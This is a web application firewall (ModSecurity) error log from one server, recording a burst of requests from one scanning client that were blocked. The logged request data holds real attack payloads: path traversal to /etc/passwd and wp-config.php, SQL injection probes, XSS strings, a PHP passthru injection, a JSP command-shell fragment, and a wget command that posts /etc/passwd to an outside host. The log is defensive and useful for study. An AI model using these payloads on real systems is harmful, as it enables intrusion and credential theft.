[Tue Aug 29 11:47:06.435137 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Rule 7fe1c6360a88 [id "981242"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "237"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjdQLoAAAAZ"]
[Tue Aug 29 11:47:06.435205 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/readycloud_control.cgi"] [unique_id "ZO14SsCo-f0AAAjdQLoAAAAZ"]
[Tue Aug 29 11:47:07.544168 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:open. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:open: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php"] [unique_id "ZO14S8Co-f0AAAjavy0AAAAV"]
[Tue Aug 29 11:47:07.607763 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:name[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:name[]: $(wget --post-file /etc/passwd cjmnbitjmimt14dgn26g9aed4hdaarcn9.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/api/getServices"] [unique_id "ZO14S8Co-f0AAAjqDC4AAAAH"]
[Tue Aug 29 11:47:10.484881 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAdxUzcAAAAC"]
[Tue Aug 29 11:47:11.423155 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAh131wAAAAz"]
[Tue Aug 29 11:47:13.466921 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAj112MAAAAa"]
[Tue Aug 29 11:47:14.376207 2023] [:error] [pid 2253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjN0SoAAAAU"]
[Tue Aug 29 11:47:15.516642 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAhui7IAAAAr"]
[Tue Aug 29 11:47:16.017612 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14VMCo-f0AAAjZRZYAAAAS"]
[Tue Aug 29 11:47:16.404152 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAhui7UAAAAr"]
[Tue Aug 29 11:47:18.479065 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14VsCo-f0AAAh132sAAAAz"]
[Tue Aug 29 11:47:19.407316 2023] [:error] [pid 2302] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dt: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cWindows\\x5c\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/XmlPeek.aspx"] [unique_id "ZO14V8Co-f0AAAj@-uMAAAAI"]
[Tue Aug 29 11:47:19.575990 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: Banking' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,md5(999999999),15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14V8Co-f0AAAjdQNcAAAAZ"]
[Tue Aug 29 11:47:22.420914 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{alert(document.domain)}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS_NAMES:{alert(document.domain)}: {alert(document.domain)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO14WsCo-f0AAAjKyxIAAAAQ"]
[Tue Aug 29 11:47:23.409549 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/index.action"] [unique_id "ZO14W8Co-f0AAAjZRZ8AAAAS"]
[Tue Aug 29 11:47:25.392656 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XcCo-f0AAAhui8wAAAAr"]
[Tue Aug 29 11:47:25.487811 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:file: /../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/components/com_moofaq/includes/file_includer.php"] [unique_id "ZO14XcCo-f0AAAhui88AAAAr"]
[Tue Aug 29 11:47:26.377699 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14XsCo-f0AAAfECDsAAAAO"]
[Tue Aug 29 11:47:27.409871 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAjZRbAAAAAS"]
[Tue Aug 29 11:47:31.494975 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAi2yIkAAAAN"]
[Tue Aug 29 11:47:32.875291 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0KEAAAAi"]
[Tue Aug 29 11:47:34.535537 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAfECE0AAAAO"]
[Tue Aug 29 11:47:36.948827 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjIhqMAAAAJ"]
[Tue Aug 29 11:47:37.465193 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAhl0KwAAAAi"]
[Tue Aug 29 11:47:39.431391 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjW9GEAAAAA"]
[Tue Aug 29 11:47:40.374140 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjW9GIAAAAA"]
[Tue Aug 29 11:47:40.381253 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bMCo-f0AAAjW9GIAAAAA"]
[Tue Aug 29 11:47:42.364776 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAhT4CUAAAAD"]
[Tue Aug 29 11:47:42.405020 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14bsCo-f0AAAkNPnUAAAAI"]
[Tue Aug 29 11:47:42.409611 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bsCo-f0AAAhT4CcAAAAD"]
[Tue Aug 29 11:47:42.418270 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Rule 7fe1c5ef2158 [id "981247"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "243"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO14bsCo-f0AAAhT4CcAAAAD"]
[Tue Aug 29 11:47:43.670666 2023] [:error] [pid 2305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') OR true-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14b8Co-f0AAAkBKnUAAAAb"]
[Tue Aug 29 11:47:44.359844 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/templates/default/html/windows/right.php"] [unique_id "ZO14cMCo-f0AAAkNPn4AAAAI"]
[Tue Aug 29 11:47:44.418662 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sb_category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:sb_category: ') AND false-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/module/ph_simpleblog/list"] [unique_id "ZO14cMCo-f0AAAjrbJcAAAAP"]
[Tue Aug 29 11:47:45.462864 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<%@ page import. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: .*\\x22%>\\x0d\\x0a<%\\x0d\\x0a found within ARGS:<%@ page import: \\x22java.util.*,java.io.*\\x22%>\\x0d\\x0a<%\\x0d\\x0aif (request.getParameter(\\x22cmd\\x22) != null) {\\x0d\\x0a        out.println(\\x22Command: \\x22   request.getParameter(\\x22cmd\\x22)   \\x22<BR>\\x22);\\x0d\\x0a        Process p = Runtime.getRuntime().exec(request.getParameter(\\x22cmd\\x22));\\x0d\\x0a        OutputStream os = p.getOutputStream();\\x0d\\x0a        InputStream in = p.getInputStream();\\x0d\\x0a        DataInputStream dis = new D..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/poc.jsp/"] [unique_id "ZO14ccCo-f0AAAjL8WcAAAAR"]
[Tue Aug 29 11:47:47.228699 2023] [:error] [pid 2332] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/poc.jsp"] [unique_id "ZO14c8Co-f0AAAkcgSYAAAAM"]
